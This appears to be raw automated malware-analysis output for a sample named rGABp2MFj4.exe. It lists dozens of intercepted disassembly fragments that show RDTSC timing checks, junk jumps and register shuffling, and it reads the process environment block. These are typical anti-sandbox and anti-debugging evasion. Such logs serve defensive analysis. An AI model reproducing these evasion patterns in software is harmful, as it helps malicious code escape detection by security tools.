Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 179D16E second address: 179D1EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C1180B47h 0x00000009 popad 0x0000000a nop 0x0000000b sub edx, dword ptr [ebp+122D19C6h] 0x00000011 push 00000004h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FC7C1180B38h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D208Dh], ebx 0x00000033 mov edx, dword ptr [ebp+122D3789h] 0x00000039 call 00007FC7C1180B39h 0x0000003e jnp 00007FC7C1180B3Eh 0x00000044 jnc 00007FC7C1180B38h 0x0000004a push eax 0x0000004b jc 00007FC7C1180B42h 0x00000051 jne 00007FC7C1180B3Ch 0x00000057 mov eax, dword ptr [esp+04h] 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e push ebx 0x0000005f pop ebx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 17A020A second address: 17A0219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FC7C0FA6753h 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 179FD76 second address: 179FD7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0028 second address: 75E009C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 mov si, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e call 00007FC7C0FA673Ah 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007FC7C0FA6741h 0x0000001c sbb eax, 64E11CE6h 0x00000022 jmp 00007FC7C0FA6741h 0x00000027 popfd 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a pushad 0x0000002b mov di, si 0x0000002e jmp 00007FC7C0FA6748h 0x00000033 popad 0x00000034 mov ebp, esp 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FC7C0FA673Ah 0x0000003f rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E009C second address: 75E00A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E00A0 second address: 75E00A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E00A6 second address: 75E00AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E00AD second address: 75E010C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr fs:[00000030h] 0x0000000d jmp 00007FC7C0FA6744h 0x00000012 sub esp, 18h 0x00000015 jmp 00007FC7C0FA6740h 0x0000001a xchg eax, ebx 0x0000001b pushad 0x0000001c jmp 00007FC7C0FA673Dh 0x00000021 popad 0x00000022 push eax 0x00000023 pushad 0x00000024 mov esi, edx 0x00000026 mov edi, 5BC0D83Eh 0x0000002b popad 0x0000002c xchg eax, ebx 0x0000002d pushad 0x0000002e jmp 00007FC7C0FA673Bh 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E010C second address: 75E0110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0110 second address: 75E0146 instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ebx, dword ptr [eax+10h] 0x0000000b pushad 0x0000000c mov ax, 9523h 0x00000010 movzx eax, di 0x00000013 popad 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FC7C0FA673Dh 0x0000001e jmp 00007FC7C0FA673Bh 0x00000023 popfd 0x00000024 movzx eax, dx 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0146 second address: 75E0193 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c jmp 00007FC7C1180B40h 0x00000011 mov esi, dword ptr [756006ECh] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a movsx ebx, cx 0x0000001d call 00007FC7C1180B46h 0x00000022 pop esi 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0193 second address: 75E01C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA6740h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC7C0FA6747h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E01C2 second address: 75E01C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E01C8 second address: 75E01CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E01CC second address: 75E021B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FC7C1181930h 0x00000011 jmp 00007FC7C1180B46h 0x00000016 xchg eax, edi 0x00000017 pushad 0x00000018 mov ebx, eax 0x0000001a mov edx, esi 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f movsx edi, ax 0x00000022 mov dx, si 0x00000025 popad 0x00000026 xchg eax, edi 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FC7C1180B3Fh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E021B second address: 75E027F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC7C0FA673Fh 0x00000008 pushfd 0x00000009 jmp 00007FC7C0FA6748h 0x0000000e xor esi, 47E36038h 0x00000014 jmp 00007FC7C0FA673Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d call dword ptr [755D0B60h] 0x00000023 mov eax, 7696E5E0h 0x00000028 ret 0x00000029 jmp 00007FC7C0FA6746h 0x0000002e push 00000044h 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E027F second address: 75E0283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0283 second address: 75E0289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0289 second address: 75E02B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a jmp 00007FC7C1180B40h 0x0000000f xchg eax, edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E02B9 second address: 75E02BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E02BD second address: 75E02DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E02DA second address: 75E02EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C0FA673Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E02EA second address: 75E0335 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov dx, si 0x00000010 popad 0x00000011 xchg eax, edi 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FC7C1180B3Ah 0x00000019 adc ax, 2418h 0x0000001e jmp 00007FC7C1180B3Bh 0x00000023 popfd 0x00000024 movzx eax, di 0x00000027 popad 0x00000028 push dword ptr [eax] 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FC7C1180B3Eh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0335 second address: 75E0350 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA673Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0350 second address: 75E0354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0354 second address: 75E035A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E035A second address: 75E0384 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [eax+18h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC7C1180B47h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E03BC second address: 75E03C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E03C0 second address: 75E03DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E03DD second address: 75E03E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E03E3 second address: 75E03E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E03E7 second address: 75E0409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FC82EF459EFh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC7C0FA6742h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0409 second address: 75E040F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E040F second address: 75E0430 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC7C0FA6740h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0430 second address: 75E043F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E043F second address: 75E0466 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi], edi 0x0000000a pushad 0x0000000b mov esi, 3D5BF839h 0x00000010 push eax 0x00000011 push edx 0x00000012 call 00007FC7C0FA6744h 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0466 second address: 75E04A0 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC7C1180B3Bh 0x00000008 add esi, 18B0D3DEh 0x0000000e jmp 00007FC7C1180B49h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov dword ptr [esi+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E04A0 second address: 75E04B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA673Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E04B3 second address: 75E051D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c pushad 0x0000000d mov dh, ah 0x0000000f jmp 00007FC7C1180B49h 0x00000014 popad 0x00000015 mov dword ptr [esi+0Ch], eax 0x00000018 jmp 00007FC7C1180B3Eh 0x0000001d mov eax, dword ptr [ebx+4Ch] 0x00000020 jmp 00007FC7C1180B40h 0x00000025 mov dword ptr [esi+10h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E051D second address: 75E0521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0521 second address: 75E0525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0525 second address: 75E052B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E052B second address: 75E0593 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, cl 0x00000005 pushfd 0x00000006 jmp 00007FC7C1180B47h 0x0000000b or eax, 049C236Eh 0x00000011 jmp 00007FC7C1180B49h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebx+50h] 0x0000001d jmp 00007FC7C1180B3Eh 0x00000022 mov dword ptr [esi+14h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 call 00007FC7C1180B3Dh 0x0000002d pop esi 0x0000002e mov bh, EFh 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0593 second address: 75E05B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC7C0FA6749h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E05B1 second address: 75E0642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [ebx+54h] 0x0000000a jmp 00007FC7C1180B3Ch 0x0000000f mov dword ptr [esi+18h], eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FC7C1180B3Eh 0x00000019 or ah, FFFFFFD8h 0x0000001c jmp 00007FC7C1180B3Bh 0x00000021 popfd 0x00000022 mov ch, 31h 0x00000024 popad 0x00000025 mov eax, dword ptr [ebx+58h] 0x00000028 jmp 00007FC7C1180B3Bh 0x0000002d mov dword ptr [esi+1Ch], eax 0x00000030 jmp 00007FC7C1180B46h 0x00000035 mov eax, dword ptr [ebx+5Ch] 0x00000038 jmp 00007FC7C1180B40h 0x0000003d mov dword ptr [esi+20h], eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FC7C1180B47h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0642 second address: 75E06F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC7C0FA673Fh 0x00000008 call 00007FC7C0FA6748h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [ebx+60h] 0x00000014 pushad 0x00000015 mov cx, di 0x00000018 pushfd 0x00000019 jmp 00007FC7C0FA6743h 0x0000001e xor eax, 293AAF1Eh 0x00000024 jmp 00007FC7C0FA6749h 0x00000029 popfd 0x0000002a popad 0x0000002b mov dword ptr [esi+24h], eax 0x0000002e pushad 0x0000002f mov esi, edx 0x00000031 popad 0x00000032 mov eax, dword ptr [ebx+64h] 0x00000035 pushad 0x00000036 pushad 0x00000037 jmp 00007FC7C0FA673Dh 0x0000003c pushad 0x0000003d popad 0x0000003e popad 0x0000003f popad 0x00000040 mov dword ptr [esi+28h], eax 0x00000043 jmp 00007FC7C0FA673Ch 0x00000048 mov eax, dword ptr [ebx+68h] 0x0000004b jmp 00007FC7C0FA6740h 0x00000050 mov dword ptr [esi+2Ch], eax 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E06F3 second address: 75E06FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 6F3Eh 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E06FC second address: 75E0702 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0702 second address: 75E07BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [ebx+6Ch] 0x0000000c pushad 0x0000000d call 00007FC7C1180B48h 0x00000012 pop eax 0x00000013 mov bl, A7h 0x00000015 popad 0x00000016 mov word ptr [esi+30h], ax 0x0000001a pushad 0x0000001b mov dl, al 0x0000001d popad 0x0000001e mov ax, word ptr [ebx+00000088h] 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FC7C1180B48h 0x0000002c adc ax, E5C8h 0x00000031 jmp 00007FC7C1180B3Bh 0x00000036 popfd 0x00000037 pushfd 0x00000038 jmp 00007FC7C1180B48h 0x0000003d sbb esi, 6CF5E828h 0x00000043 jmp 00007FC7C1180B3Bh 0x00000048 popfd 0x00000049 popad 0x0000004a mov word ptr [esi+32h], ax 0x0000004e jmp 00007FC7C1180B46h 0x00000053 mov eax, dword ptr [ebx+0000008Ch] 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c mov di, 32A0h 0x00000060 pushad 0x00000061 popad 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E07BB second address: 75E07EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA6744h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+34h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC7C0FA6747h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E07EF second address: 75E0807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C1180B44h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0807 second address: 75E0820 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA673Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+18h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov ebx, eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0820 second address: 75E089F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC7C1180B3Eh 0x00000008 adc ah, FFFFFFD8h 0x0000000b jmp 00007FC7C1180B3Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ecx 0x00000014 mov esi, ebx 0x00000016 pop ebx 0x00000017 popad 0x00000018 mov dword ptr [esi+38h], eax 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FC7C1180B3Ch 0x00000022 sub esi, 174ABF38h 0x00000028 jmp 00007FC7C1180B3Bh 0x0000002d popfd 0x0000002e mov di, ax 0x00000031 popad 0x00000032 mov eax, dword ptr [ebx+1Ch] 0x00000035 jmp 00007FC7C1180B42h 0x0000003a mov dword ptr [esi+3Ch], eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FC7C1180B47h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E089F second address: 75E08E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 call 00007FC7C0FA673Bh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [ebx+20h] 0x00000011 pushad 0x00000012 push eax 0x00000013 jmp 00007FC7C0FA6747h 0x00000018 pop eax 0x00000019 popad 0x0000001a mov dword ptr [esi+40h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FC7C0FA6741h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E08E9 second address: 75E08ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E08ED second address: 75E08F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E08F3 second address: 75E08F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E08F8 second address: 75E0960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+00000080h] 0x0000000f jmp 00007FC7C0FA6742h 0x00000014 push 00000001h 0x00000016 jmp 00007FC7C0FA6740h 0x0000001b nop 0x0000001c jmp 00007FC7C0FA6740h 0x00000021 push eax 0x00000022 jmp 00007FC7C0FA673Bh 0x00000027 nop 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FC7C0FA6745h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0960 second address: 75E0970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C1180B3Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0970 second address: 75E0974 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E09C6 second address: 75E09CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E09CA second address: 75E09D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E09D0 second address: 75E09F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edx, 559FFA40h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E09F5 second address: 75E0A78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA6744h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FC82EF453ECh 0x0000000f jmp 00007FC7C0FA6740h 0x00000014 mov eax, dword ptr [ebp-0Ch] 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FC7C0FA673Eh 0x0000001e sbb cl, FFFFFFE8h 0x00000021 jmp 00007FC7C0FA673Bh 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007FC7C0FA6748h 0x0000002d adc ah, 00000048h 0x00000030 jmp 00007FC7C0FA673Bh 0x00000035 popfd 0x00000036 popad 0x00000037 mov dword ptr [esi+04h], eax 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d mov esi, ebx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75E0A78 second address: 75E0A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
